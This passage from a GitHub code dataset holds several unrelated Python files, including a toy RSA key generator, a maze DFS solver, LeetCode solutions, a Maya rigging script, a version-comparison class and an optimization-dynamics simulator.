will be %s\" % n)\n\n# calculate Φ(N) = (p-1) (q-1)\n\nphi_n = ((prime1-1)*(prime2-1))\n\n# choose E\n\nprint(\"Searching for e ... please wait\")\n\ne = find_e(n,phi_n)\n\n# at this point we have a long list of candidates for e. let's let the user select one by entering a random number\n\nchoice_e = input(\"to choose a particular e, pick a random number between 1 and %s: \" % len(e))\n\ne = e[int(choice_e)]\n\n# find d\n\nd = find_d(prime1,n)\n\n# let's put those keys into a nice dictionary\n\n# Example keypair:\n\nname = input('Please enter a name for this keypair (e.g. reuben_keypair): ')\n\npublic_key = {'e':e, 'n':n}\nprivate_key = {'d':d, 'n':n}\n\nprint(\"Saving key pair %s_.txt to working directory. 
Put it somewhere safe!\" % name)\n\nkey_file = open(\"%s.txt\" % name, \"w\")\nkey_file.write(\"%s, %s\" % (public_key, private_key))\nkey_file.close()\n\n# Encryption and decryption\n\ndef encrypt(pt):\n\tprint('encrypting message ... ')\n\treturn (pt ** public_key['e']) % public_key['n']\n\ndef decrypt(ct):\n\treturn (ct ** private_key['d'] % public_key['n'])","repo_name":"RDBinns/diy_rsa","sub_path":"aressay.py","file_name":"aressay.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"40922851563","text":"# 상세 화면에서 보여줄 직선 그래프\n\nimport pandas as pd\nimport datetime\nfrom dateutil.relativedelta import relativedelta\nimport requests\nimport config\nimport json\n\ndef chart1(wealth_result):\n data = wealth_result[\"trade_lnfo\"]\n print(\"chart1 data /////\")\n # print(data)\n # 거래내역이 비어있지 않을때 \n if len(data) > 0 :\n # 거래내역으로 데이터 프레임제작\n df = pd.DataFrame(data)\n # 거래일별 소비금액 계산\n df_data = df.groupby('tran_datetime')[['tran_amt']].sum()\n # 소비금액이 0 인 날짜가 있다면 추가로 넣어주는 작업\n date_list = wealth_result[\"day_list\"]\n set(df_data.index)\n set(date_list)\n blank_list = set(date_list)- set(df_data.index)\n blank_list\n for date in blank_list :\n df_data.loc[date] = [0]\n \n # 날짜 순서대로 정렬 후 마무리\n df_data = df_data.sort_index()\n df_data.reset_index(drop=False, inplace=True)\n\n # 시작날짜의 통장 잔액의 합계 week_money\n week_money = wealth_result[\"week_money\"]\n # 빈 데이터 프레임 만들어서 0으로 채워넣기\n df2 = pd.DataFrame(index=range(0,7),columns=['tran_datetime', 'tran_amt'])\n df2 = df2.fillna(0)\n # week_money에서 일별 소비금액을 제해 일별 잔액 계산\n for i in range(7) :\n if i == 0 :\n df2.iloc[i, 0] = date_list[i]\n df2.iloc[i, 1] = week_money - df_data.iloc[i, 1]\n else :\n df2.iloc[i, 0] = date_list[i]\n df2.iloc[ i, 1] = df2.iloc[ i - 1 , 1] - df_data.iloc[i, 1]\n\n # 차트로 넘겨줄 데이터 정리\n chart1_x = df_data['tran_datetime'].tolist()\n chart1_y = df_data['tran_amt'].tolist()\n chart2_x = df2['tran_datetime'].tolist()\n chart2_y = df2['tran_amt'].tolist()\n\n\n\n\n return {\"chart1_x\" : chart1_x, \"chart1_y\":chart1_y, \"chart2_x\":chart2_x, \"chart2_y\":chart2_y}\n\n","repo_name":"jkong72/ginkgo-lambda-flask-api","sub_path":"charts/chart1.py","file_name":"chart1.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"70421913924","text":"from torchvision.models import resnet18\nfrom torch import nn\nimport torch\n\nclass Net(nn.Module):\n\n def __init__(self,out_features):\n super(Net, self).__init__()\n self.headbone = resnet18(True)\n self.headbone.fc = nn.Sequential(\n nn.Linear(512, out_features)\n )\n\n def forward(self,x):\n x = self.headbone(x)\n return x\n\nif __name__ == '__main__':\n m = Net(3)\n print(m)\n x = torch.randn(2,3,112,112)\n print(m(x).shape)","repo_name":"HibikiJie/ClassificationFramework","sub_path":"models/resnet18.py","file_name":"resnet18.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"39993965016","text":"#-------------------------------------------------------------------#\t\t\t\t \r\n#\tDevin Suy\r\n# ID: 017001983\r\n#\tDate: 7/14/2020\r\n#\temail: DevinSuy@gmail.com\r\n# version: 1.0.0\r\n#------------------------------------------------------------------\r\nfrom Board.GameBoard import GameBoard\r\nimport sys\r\n\r\nclass DFS:\r\n def __init__(self, graph, file_name, output_folder):\r\n self.graph 
= graph\r\n self.file_name = file_name[:-8] # Trim to just the \"size\" of the maze\r\n self.output_folder = output_folder\r\n self.num_expanded = self.max_fringe = self.current_fringe = 0\r\n\r\n self.solutions = []\r\n self.current_solution = []\r\n self.solutions_nums = []\r\n self.current_solution_nums = []\r\n\r\n self.start_cell = self.graph.cells[self.graph.start_cell]\r\n self.goal_cell = self.graph.cells[self.graph.goal_cell]\r\n\r\n \r\n def reset_stats(self):\r\n self.solutions.clear()\r\n self.current_solution.clear()\r\n self.solutions_nums.clear()\r\n self.current_solution_nums.clear()\r\n self.num_expanded = self.max_fringe = self.current_fringe = 0\r\n\r\n \r\n # Depth First Search algorithm using LIFO stack\r\n def DFS(self):\r\n stack = [self.start_cell] # Initialize our stack with our starting cell\r\n self.start_cell.visited = True\r\n \r\n while stack:\r\n current_cell = stack[-1] # Poll the head of our \"stack\"\r\n\r\n # This is our first time at this node, expand it\r\n if not current_cell.visited:\r\n self.num_expanded += 1\r\n\r\n current_cell.visited = True\r\n\r\n # Bookkeeping\r\n if len(stack) > self.max_fringe:\r\n self.max_fringe = len(stack)\r\n \r\n # Process all unvisited neighbors of our curent cell\r\n dead_end = True\r\n for adj_cell_num, adj_cell in current_cell.adj.items():\r\n if adj_cell_num == self.graph.goal_cell:\r\n print(\"\\nDFS First Solution Found!\\n-------------------------\")\r\n \r\n # Retrace the solution path\r\n current_solution = [adj_cell]\r\n path_cell = current_cell\r\n\r\n while path_cell != False:\r\n current_solution.append(path_cell)\r\n path_cell = path_cell.prev\r\n\r\n # Change the ordering of cells from end -> start to start -> end\r\n return current_solution[::-1]\r\n \r\n else:\r\n if not adj_cell.visited:\r\n dead_end = False\r\n stack.append(adj_cell)\r\n adj_cell.prev = current_cell # Maintain a parent pointer so we can retrace our solution path\r\n break # Process one neighbor at a time, advance \"deeper\" until backtracked\r\n \r\n # If there are no futher neighbors to traverse deeper into\r\n # remove from stack and backtrack\r\n if dead_end:\r\n stack.pop() \r\n\r\n # If the queue empties without finding a solution, all have been found\r\n return False \r\n\r\n\r\n def exhaustive_DFS_util(self, src, dst):\r\n src.visited = True\r\n self.current_solution_nums.append(src.cell_num)\r\n self.current_solution.append(src)\r\n\r\n # Goal cell was reached, save the solution\r\n if src == dst:\r\n self.solutions_nums.append(self.current_solution_nums[::-1]) # Append the reversed path\r\n self.solutions.append(self.current_solution[::-1])\r\n\r\n # Otherwise, process neighbors\r\n for adj_id, adj_node in src.adj.items():\r\n if not adj_node.visited:\r\n self.current_fringe += 1\r\n if self.current_fringe > self.max_fringe:\r\n self.max_fringe = self.current_fringe\r\n \r\n self.exhaustive_DFS_util(adj_node, dst) # Recurr\r\n\r\n # If here we reached a dead end, no more unvisited adjacent\r\n # neighbors to traverse deeper into, backtrack\r\n self.current_solution_nums.pop()\r\n self.current_solution.pop()\r\n src.visited = False\r\n src.completed = True\r\n self.current_fringe -= 1\r\n\r\n\r\n def find_first_solution(self):\r\n self.graph.reset_cells()\r\n self.reset_stats()\r\n solution = self.DFS()\r\n \r\n # Output results\r\n print(\"Path: \", [cell.cell_num for cell in solution] )\r\n print(\"Solution Length: \", len(solution), \"\\n\")\r\n print(\"(DFS First Solution) Number of Expanded Nodes: \", 
self.num_expanded)\r\n print(\"(DFS First Solution) Max Fringe Size: \", self.max_fringe, \"\\n\\n\")\r\n\r\n self.graph.write_solution(self.file_name + \"_DFS_First_Solution\", self.output_folder.joinpath(\"DFS\"), solution)\r\n self.graph.write_solution(self.file_name + \"_DFS_First_Solution\", self.output_folder.joinpath(\"DFS/DFS_All_\" + self.file_name + \"_Solutions\"), solution)\r\n\r\n\r\n def perform_search(self):\r\n self.graph.reset_cells()\r\n self.reset_stats()\r\n\r\n # Start DFS from the initial cell to goal\r\n self.exhaustive_DFS_util(self.start_cell, self.goal_cell)\r\n\r\n # Print all solution numbers\r\n solution_count = 1\r\n for solution in self.solutions_nums:\r\n solution = solution[::-1]\r\n print(\"(DFS Exhaustive) Solution #\", solution_count, \" length: \", len(solution))\r\n # print(\"Path: \", solution)\r\n solution_count += 1\r\n print(\"(DFS Exhaustive) Number of Expanded Nodes: \", len(self.graph.cells))\r\n print(\"(DFS Exhaustive) Max Fringe Size: \", self.max_fringe, \"\\n\\n\")\r\n\r\n # Write all solutions to maze .lay files and locate the optimal least cost solution\r\n solution_count = 1\r\n min_solution = None\r\n min_cost = float('inf')\r\n for solution in self.solutions:\r\n solution = solution[::-1]\r\n if len(solution) < min_cost:\r\n min_cost = len(solution)\r\n min_solution = solution\r\n\r\n self.graph.write_solution(self.file_name + \"_DFS_Solution_\" + str(solution_count), self.output_folder.joinpath(\"DFS/DFS_All_\" + self.file_name + \"_Solutions\"), solution)\r\n solution_count += 1\r\n \r\n print(\"All solutions written to :\", self.output_folder.joinpath(\"DFS/DFS_All_\" + self.file_name + \"_Solutions\"))\r\n \r\n print(\"\\nOptimal DFS solution located, length: \", min_cost)\r\n optimal_path = [cell.cell_num for cell in min_solution] \r\n # print(\"Path: \", optimal_path)\r\n\r\n # Write the optimal solution\r\n self.graph.write_solution(self.file_name + \"_DFS_Optimal_Solution\", self.output_folder.joinpath(\"DFS\"), min_solution)\r\n print(\"Optimal solution written to: \", self.output_folder.joinpath(\"DFS\"), \"\\\\\", self.file_name + \"_DFS_Optimal_Solution.lay\")\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n ","repo_name":"devinsuy/P2P-File-Sync","sub_path":"Demo/2_file_set/DFS.py","file_name":"DFS.py","file_ext":"py","file_size_in_byte":7198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"19105219253","text":"import requests\n\n\nclass Cotizacion:\n def __init__(self,moneda_ref,moneda_cambio,tiempo_ref=60 ):\n self.moneda_ref = moneda_ref\n self.moneda_cambio = moneda_cambio\n self.tiempo_ref = tiempo_ref\n self.base_url = 'https://api.coinbase.com/v2/exchange-rates?currency='\n self.actualizar()\n\n \n def actualizar(self):\n r = requests.get(self.base_url + self.moneda_cambio)\n self.valor_str = r.json()[\"data\"][\"rates\"][self.moneda_ref]\n self.valor = \"{:.2f}\".format(float(self.valor_str))\n # self.valor = solicita_nuevo_precio_de(self.moneda_ref, self.moneda_cambio)\n \n\n def dame_txt(self):\n self.actualizar()\n return self.moneda_ref + ' - ' + f\"{self.valor}\" + \\\n self.moneda_cambio \n","repo_name":"MargaLop/exchange_clases","sub_path":"cotizacion.py","file_name":"cotizacion.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"13448186910","text":"\"\"\"\n\"()(())\"\noutput: 6\n\nInput: \")()())\"\nOutput: 4\n\"\"\"\n\n\nclass Solution(object):\n def 
longestValidParentheses(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if not s or len(s) == 0: return 0\n n = len(s)\n maxLen = 0\n\n stack = [-1]\n for i in range(len(s)):\n if stack[-1] != -1 and s[stack[-1]] == \"(\" and s[i] == \")\":\n stack.pop()\n maxLen = max(maxLen , i - stack[-1])\n else:\n stack.append(i)\n return maxLen\n\n\"\"\"\n// Time: O(n), Space: O(n)\nhttps://algocasts.io/episodes/n5GqbVpA\n答案:\n1.algocasts 里的p,代表的就是stack peek元素\n2.\n\"\"\"","repo_name":"Nexnull/Leetcoding","sub_path":"leetcode/stack & queue/32. Longest Valid Parentheses.py","file_name":"32. Longest Valid Parentheses.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"40480631773","text":"import collections;\nimport math;\n\nDIR_VEC = ((-1, 0), (1, 0), (0, -1), (0, 1));\n\ndef checkFirstImpossible(gridList : List[List[int]], visitList : List[List[bool]], r : int, c : int) -> bool:\n return ((r < 0) or (r >= len(gridList)) or (c < 0) or (c >= len(gridList[r])) or (gridList[r][c] == 0) or (visitList[r][c] != math.inf));\n\ndef checkSecondImpossible(gridList : List[List[int]], visitList : List[List[bool]], r : int, c : int, dist : int) -> bool:\n return ((r < 0) or (r >= len(gridList)) or (c < 0) or (c >= len(gridList[r])));\n\ndef firstBFS(gridList : List[List[int]], visitList : List[List[bool]], startR : int, startC : int) -> None:\n dq = collections.deque([[startR, startC]]);\n \n while (dq):\n (curR, curC) = dq.popleft();\n \n for (dr, dc) in DIR_VEC:\n (nextR, nextC) = (curR + dr, curC + dc);\n \n if (checkFirstImpossible(gridList, visitList, nextR, nextC)):\n continue;\n \n visitList[nextR][nextC] = -1;\n dq.append([nextR, nextC]);\n \n return None;\n\ndef secondBFS(gridList : List[List[int]], visitList : List[List[bool]], startR : int, startC : int) -> int:\n dq = collections.deque([[startR, startC, 0]]);\n \n while (dq):\n (curR, curC, curDist) = dq.popleft();\n \n # print(curR, curC, curDist);\n # print(visitList);\n \n for (dr, dc) in DIR_VEC:\n (nextR, nextC, nextDist) = (curR + dr, curC + dc, curDist + 1);\n \n if (checkSecondImpossible(gridList, visitList, nextR, nextC, nextDist)):\n continue;\n \n if (gridList[nextR][nextC] == 1):\n if (visitList[nextR][nextC] == -1):\n return curDist;\n elif (visitList[nextR][nextC] == -2):\n continue;\n else: \n if (visitList[nextR][nextC] <= nextDist):\n continue;\n\n visitList[nextR][nextC] = nextDist;\n dq.append([nextR, nextC, nextDist]);\n \n return math.inf;\n\nclass Solution:\n def shortestBridge(self, grid: List[List[int]]) -> int:\n (answer, bfsCnt, visitList) = (math.inf, 0, [[math.inf for _ in range(len(grid[0]))] for _ in range(len(grid))]);\n \n for r in range(len(grid)):\n for c in range(len(grid[r])):\n # print(r, c, grid[r][c], visitList[r][c]);\n \n if ((grid[r][c] == 0) or (visitList[r][c] not in (math.inf, -2))):\n continue;\n\n if (bfsCnt == 0):\n (bfsCnt, visitList[r][c]) = (1, -1);\n firstBFS(grid, visitList, r, c);\n elif (bfsCnt == 1):\n visitList[r][c] = -2;\n answer = min(answer, secondBFS(grid, visitList, r, c));\n\n # print(visitList);\n \n return answer;\n","repo_name":"REVANgers/all-solved-club","sub_path":"members/U02BQ6G1SQJ/leetcode/Array/leetcode934.py","file_name":"leetcode934.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"28830370874","text":"def isValidSudoku(board):\n def isValid(a):\n \"\"\"\n a: a 
list of length 9\n return: boolean\n \"\"\"\n digits = '123456789'\n d = {}\n for c in a:\n if c in digits:\n if c not in d:\n d[c] = 1\n else:\n return False\n elif c != '.':\n return False\n return True\n \n for row in range(9):\n if not isValid(board[row]):\n return False\n \n for column in range(9):\n a = []\n for row in range(9):\n a.append(board[row][column])\n if not isValid(a):\n return False\n \n for i in range(3):\n for j in range(3):\n a = [board[3*i][3*j], board[3*i][3*j+1], board[3*i][3*j+2],\n board[3*i+1][3*j], board[3*i+1][3*j+1], board[3*i+1][3*j+2],\n board[3*i+2][3*j], board[3*i+2][3*j+1], board[3*i+2][3*j+2]]\n if not isValid(a):\n return False\n \n return True","repo_name":"xingyuanp/LeeCodeOJ","sub_path":"Python/valid_sudoku.py","file_name":"valid_sudoku.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74867291846","text":"import maya.cmds as cmds\n\ndef worldRig():\n\t\n\t#ClearSelection\n\n\tcmds.select(clear=True)\n\n\t#Trouver la BB\n\tslc = cmds.select('*:MOD_grp')\n\tbbox = cmds.exactWorldBoundingBox()\n\tslc = cmds.select(clear=True)\n\tbbox = [abs(ele) for ele in bbox] \n\n\t#Creer les joint Root et Ultimate en fonction de la BB\n\tcmds.joint(name='c_root_jnt', p=(0,0,0))\n\tcmds.joint(name='c_ultimate_jnt', p=(0,bbox[4],0))\n\tcmds.select('c_root_jnt')\n\tcmds.group(name='RIG_grp')\n\tcmds.setAttr('RIG_grp.visibility', 0)\n\n\t#Skin des joints a la geo\n\tcmds.select(clear=True)\n\tcmds.select('*:MOD_grp', 'c_root_jnt')\n\tcmds.bindSkin(tsb=True)\n\n\t#Trouver le scale des controleurs\n\t#On retire les valeurs Y de la bounding box puis on trie les valeurs restantes \n\tbbox.remove(bbox[1])\n\tbbox.remove(bbox[3])\n\tbbox.sort()\n\n\t#Creer le Controleur Global, lui donner les bonnes dimensions puis FT et DH\n\tcmds.circle(n='c_global_0001_ctrl', nr=(0,1,0), c=(0,0,0))\n\tcmds.scale(bbox[-1]*2, 1, bbox[-1]*2)\n\tcmds.delete(constructionHistory = True)\n\tcmds.makeIdentity(apply=True, scale=True)\n\tcmds.group(name=\"c_global_0001_off\")\n\n\t#Creer le Controleur Root, lui donner les bonnes dimensions puis FT et DH\n\tcmds.circle(n='c_root_0001_ctrl', nr=(0,1,0), c=(0,0,0))\n\tcmds.scale(bbox[-1]*1.5, 1, bbox[-1]*1.5)\n\tcmds.delete(constructionHistory = True)\n\tcmds.makeIdentity(apply=True, scale=True)\n\tcmds.group(name=\"c_root_0001_off\")\n\tcmds.parent('c_root_0001_off', 'c_global_0001_ctrl')\n\n\tcmds.select('c_global_0001_off')\n\tcmds.group(name='CTRL_grp')\n\n\t#Creer la contrainte entre le ctrl et le joint\n\tcmds.parentConstraint('c_root_0001_ctrl', 'c_root_jnt', maintainOffset=True, weight=1)\n\n\t#Creer un groupe Global\n\tcmds.select('CTRL_grp', 'RIG_grp', '*:MOD_grp')\n\tcmds.group(name='Asset_grp')\n","repo_name":"Amneoxiss/animation_pipeline","sub_path":"vulcain/softwares/dcc/maya/tools/rigging/worldRig/worldRig.py","file_name":"worldRig.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"30734428193","text":"import re # To replace parts of version strings with regex.\nfrom typing import cast, Union, List\n\nfrom UM.Decorators import deprecated\nfrom UM.Logger import Logger\n\n\nclass Version:\n \"\"\"Represents a version number, like \"3.2.8\" and allows comparison of those\n numbers.\n \"\"\"\n\n def __init__(self, version: Union[str, bytes, int, \"Version\", List[Union[int, str, bytes]]]) -> None:\n \"\"\"Constructs the version 
instance from a string representing the version.\n\n The string representation may have dashes or underscores that separate\n the major, minor and revision version numbers. All text is ignored.\n\n :param version: A string or bytes representing a version number.\n \"\"\"\n\n # FIXME: We should probably swap this whole class out for the semver python package. That is what is used by conan.\n\n super().__init__()\n\n if type(version) == bytes:\n version = cast(bytes, version)\n version = version.decode(\"utf-8\")\n\n if isinstance(version, str):\n version = cast(str, version)\n # Versions are in (MOD-)x.x.x(-POSTFIX.x) format.\n version = version.replace(\"MOD-\", \"\")\n version = version.replace(\"-\", \".\")\n version = version.replace(\"_\", \".\")\n version = version.replace(\"\\\"\", \"\")\n version = version.replace(\"+\", \".\")\n version_list = version.split(\".\") # type: ignore\n # Only the third element (the postfix_type) is allowed to be a string. In other cases all non numeric\n # characters need to be filtered out\n try:\n version_list[0] = re.sub(r\"[A-Z]+\", \"\", version_list[0])\n version_list[1] = re.sub(r\"[A-Z]+\", \"\", version_list[1])\n version_list[2] = re.sub(r\"[A-Z]+\", \"\", version_list[2])\n version_list[4] = re.sub(r\"[A-Z]+\", \"\", version_list[4])\n except IndexError as err:\n pass\n elif isinstance(version, list):\n version_list = version # type: ignore\n elif isinstance(version, int):\n version_list = [version] # type: ignore\n elif isinstance(version, Version):\n version_list = [version.getMajor(), version.getMinor(), version.getRevision(), version.getPostfixType(), version.getPostfixVersion()] # type: ignore\n else:\n Logger.log(\"w\", \"Unable to convert version %s of type %s into a usable version\", version, type(version))\n version_list = []\n\n self._major = 0\n self._minor = 0\n self._revision = 0\n self._postfix_type = \"\"\n self._postfix_version = 0\n try:\n self._major = int(version_list[0])\n self._minor = int(version_list[1])\n self._revision = int(version_list[2])\n self._postfix_type = version_list[3]\n self._postfix_version = int(version_list[4])\n except IndexError:\n pass\n except ValueError:\n pass\n\n def getMajor(self) -> int:\n \"\"\"Gets the major version number.\n\n The major version number is the first number of the version: \"3\" in the\n version \"3.2.8\".\n \"\"\"\n\n return self._major\n\n def getMinor(self) -> int:\n \"\"\"Gets the minor version number.\n\n The minor version number is the second number of the version: \"2\" in the\n version \"3.2.8\".\n \"\"\"\n\n return self._minor\n\n def getRevision(self) -> int:\n \"\"\"Gets the revision or patch version number.\n\n The revision version number is the third number of the version: \"8\" in\n the version \"3.2.8\".\n \"\"\"\n\n return self._revision\n\n def getPostfixType(self) -> str:\n \"\"\"Gets the postfix type.\n\n The postfix type is the name of the postfix, e.g. \"alpha\" in the version \"1.2.3-alpha.4\"\n \"\"\"\n\n return self._postfix_type\n\n def getPostfixVersion(self) -> int:\n \"\"\"Gets the postfix version number.\n\n The postfix version is the last number, e.g. 
\"4\" in the version \"1.2.3-alpha.4\"\n \"\"\"\n\n return self._postfix_version\n\n @deprecated\n def getWithoutPostfix(self) -> \"Version\":\n \"\"\"Returns this as _only_ a major.minor.revision, without the postfix type/version.\n\n The postfix is everything beyond the patch, like '-beta+1' in 5.0.0-beta+1 -- in this example 5.0.0 is returned.\n \"\"\"\n\n return Version([self._major, self._minor, self._revision])\n\n def hasPostFix(self) -> bool:\n \"\"\"Check if a version has a postfix.\"\"\"\n\n return self._postfix_type != \"\"\n\n def __gt__(self, other: Union[\"Version\", str]) -> bool:\n \"\"\"Indicates whether this version is later than the specified version.\n\n Implements the > operator.\n\n :param other: Either another version object or a string representing one.\n \"\"\"\n\n if isinstance(other, Version):\n return other.__lt__(self)\n elif isinstance(other, str):\n return Version(other).__lt__(self)\n else:\n return False\n\n def __lt__(self, other: Union[\"Version\", str]) -> bool:\n \"\"\"Indicates whether this version is earlier than the specified version.\n\n Implements the < operator.\n\n :param other: Either another version object or a string representing one.\n \"\"\"\n\n if isinstance(other, Version):\n if self._major < other.getMajor():\n # The major version is lower.\n return True\n if self._minor < other.getMinor() \\\n and self._major == other.getMajor():\n # The minor version is lower.\n return True\n if self._revision < other.getRevision() \\\n and self._major == other.getMajor() \\\n and self._minor == other.getMinor():\n # The revision version is lower.\n return True\n if self.hasPostFix() and other.hasPostFix() \\\n and self._postfix_version < other.getPostfixVersion() \\\n and self._postfix_type == other.getPostfixType() \\\n and self._revision == other.getRevision() \\\n and self._major == other.getMajor() \\\n and self._minor == other.getMinor():\n # The postfix version is lower. This is only allowed if the postfix type is the same!\n return True\n if self.hasPostFix() and not other.hasPostFix():\n # If the root version is the same but the other has no postfix, we consider the other larger.\n # E.g. 
Version(\"1.0.0\") > Version(\"1.0.0-alpha.7\")\n return Version(\"{}.{}.{}\".format(\n self.getMajor(),\n self.getMinor(),\n self.getRevision()\n )) == other\n return False\n elif isinstance(other, str):\n return self < Version(other)\n else:\n return False\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Indicates whether this version is equal to the specified version.\n\n Implements the == operator.\n\n :param other: Either another version object or a string representing one.\n \"\"\"\n\n if isinstance(other, Version):\n # Direct comparison with same type.\n return self._major == other.getMajor() \\\n and self._minor == other.getMinor() \\\n and self._revision == other.getRevision() \\\n and self._postfix_type == other.getPostfixType() \\\n and self._postfix_version == other.getPostfixVersion()\n\n if isinstance(other, str):\n # Comparison with string by converting to Version first.\n return self == Version(other)\n\n return False\n\n def __ge__(self, other: Union[\"Version\", str]) -> bool:\n \"\"\"Indicates whether this version is later or equal to the specified\n version.\n\n Implements the >= operator.\n\n :param other: Either another version object or a string representing one.\n \"\"\"\n\n return self.__gt__(other) or self.__eq__(other)\n\n def __le__(self, other: Union[\"Version\", str]) -> bool:\n \"\"\"Indicates whether this version is earlier or equal to the specified\n version.\n\n Implements the <= operator.\n\n :param other: Either another version object or a string representing one.\n \"\"\"\n\n return self.__lt__(other) or self.__eq__(other)\n\n def __str__(self) -> str:\n \"\"\"Returns a string representation containing the major, minor and revision\n number.\n\n Such as \"3.2.8\".\n \"\"\"\n\n if self._postfix_type:\n # If we have a postfix, return a string including that postfix.\n return \"%s.%s.%s-%s.%s\"\\\n % (self._major, self._minor, self._revision, self._postfix_type, self._postfix_version)\n return \"%s.%s.%s\" % (self._major, self._minor, self._revision)\n\n def __hash__(self) -> int:\n \"\"\"Returns a number reasonably representing the identity of the version.\"\"\"\n\n return hash(self.__str__())\n","repo_name":"Ultimaker/Uranium","sub_path":"UM/Version.py","file_name":"Version.py","file_ext":"py","file_size_in_byte":9195,"program_lang":"python","lang":"en","doc_type":"code","stars":309,"dataset":"github-code","pt":"99"} +{"seq_id":"23020995761","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 14 15:30:25 2017\n\n@author: tthiem1\n\nA module for running various optimization algorithms on a given objective function.\n\"\"\"\n\nimport numpy as np\nfrom sklearn.neighbors import KernelDensity\nfrom scipy.spatial.distance import pdist\nfrom itertools import product\nfrom Gradient import Gradient\nfrom Davidenko import Davidenko\nfrom Nesterov import cNesterov\n\nclass OptimizationSolver():\n \"\"\"\n A class for exploring self-similarities in optimization dynamical system solutions.\n \"\"\" \n def __init__(self, InitialConditions, TimeRange, TimeOut, ObjFunc=None, DObjFunc=None, DDObjFunc=None, Algorithm='Gradient'):\n \"\"\"\n Initialize the self-similarity object with the data, the objective\n function and the evolution algorithm.\n \n Parameters\n ----------\n InitialConditions : (np.array) - An array of the initial conditions to use in the dynamical\n system simulation. 
Shape (#points, #dimensions).\n TimeRange : (np.array) - An array containing the start time and end time for the simulation.\n TimeOut : (int) - The number of points in time to output the results of the optimization.\n Positions : (np.array) - An array of the positions of the points after each optimization algorithm time step.\n Shape (#points, #dimensions, #times).\n ObjFunc : (function) - The objective function.\n DObjFunc : (function) - The derivative or Jacobian of the objective function.\n DDObjFunc : (function) - The second derivative or Hessian of the objective function.\n Algorithm : (string) - The evolution algorithm to use for the dynamical system. Possible values:\n 'Newton' : the Newton method, 'Davidenko' : a continuous version of the Newton method,\n 'Nesterov' : an accelerated gradient based optimization algorithm, 'Gradient' : the gradient descent method.\n \"\"\"\n\n self.Times = np.linspace(TimeRange[0], TimeRange[1], TimeOut)\n self.Algorithm = Algorithm\n self.Positions = np.zeros((InitialConditions.shape[0], InitialConditions.shape[1], TimeOut))\n self.Positions[:, :, 0] = InitialConditions\n self.ObjFunc = ObjFunc\n self.DObjFunc = DObjFunc\n self.DDObjFunc = DDObjFunc\n \n def Simulate(self):\n \"\"\"\n Simulate the dynamics of various optimization algorithms.\n \n Parameters\n ----------\n Algorithm : (string) - The evolution algorithm to use for the dynamical system. Possible values:\n 'Newton' : the Newton method, 'Davidenko' : a continuous version of the Newton method,\n 'Nesterov' : an accelerated gradient based optimization algorithm, 'Gradient' : the gradient descent method.\n \n Returns\n -------\n Positions : (np.array) - An array of the positions of the points after each optimization algorithm time step.\n Shape (#times, #points).\n Velocities : (np.array, Nesterov method only) - An array of the velocities of the points after each Nesterov time step.\n Shape (#times, #points).\n \"\"\"\n if self.Algorithm == 'Gradient':\n for i in range(self.Positions.shape[0]):\n self.Positions[i, :, :] = Gradient(self.Positions[i, :, 0], self.ObjFunc, self.DObjFunc, self.Times)\n elif self.Algorithm == 'Davidenko':\n for i in range(self.Positions.shape[0]):\n self.Positions[i, :, :] = Davidenko(self.Positions[i, :, 0], self.DObjFunc, self.DDObjFunc, self.Times)\n elif self.Algorithm == 'Nesterov':\n self.Velocities = np.zeros((self.Positions.shape))\n for i in range(self.Positions.shape[0]):\n self.Positions[i, :, :], self.Velocities[i, :, :] = cNesterov(self.Positions[i, :, 0], self.ObjFunc, self.DObjFunc, self.Times)\n\n def GetDensity(self, action='generate', samples=100, draws=None):\n \"\"\"\n TODO: Check density calculations for multiple dimensions.\n Generate a density estimation of the positions at each time or sample positions\n from the generated density at a specified time.\n \n Parameters\n ----------\n action : (string) - Options: 'generate', 'sample'.\n 'generate' : Generate a density estimation using kernel density estimation and save it.\n 'sample' : Generate a density estimation at the final time and both draw and return samples\n from it equal to the number of points in position.\n samples : (int) - The number of sample points in each dimension at which to measure the density.\n Total number of points is samples ** dimensions.\n draws : (int) - The number of points to draw from the density distribution, if None,\n draw a number of points equal to the number of points in Positions.\n \n Returns\n -------\n 'generate' \n DensitySamples : (np.array) - An 
array of the positions of the points used to sample the density.\n Density : (np.array) - The value of the density evaluated at each points in DensitySamples.\n 'sample'\n samples : (np.array) - An array of the samples drawn from the density generated from the positions\n at the final time.\n \"\"\"\n if action == 'generate':\n# A list of sample arrays ranging from the min value to the max value in each dimension.\n minmax = [np.linspace(np.amin(self.Positions[:, i, :]), np.amax(self.Positions[:, i, :]), samples) for i in range(self.Positions.shape[1])]\n self.DensitySamples = np.array(list(product(*minmax)))\n self.Density = np.zeros((self.DensitySamples.shape[0], self.Times.shape[0]))\n \n for i in range(self.Positions.shape[2]):\n bandwidth = 0.2 * np.mean(pdist(self.Positions[:, :, i]))\n KDE = KernelDensity(bandwidth=bandwidth, kernel='gaussian', metric='euclidean')\n KDE.fit(self.Positions[:, :, i])\n self.Density[:, i] = np.exp(KDE.score_samples(self.DensitySamples))\n \n elif action == 'sample':\n bandwidth = min(pdist(self.Positions[-1, :][:, np.newaxis]))\n KDE = KernelDensity(bandwidth=bandwidth, kernel='gaussian', metric='euclidean')\n 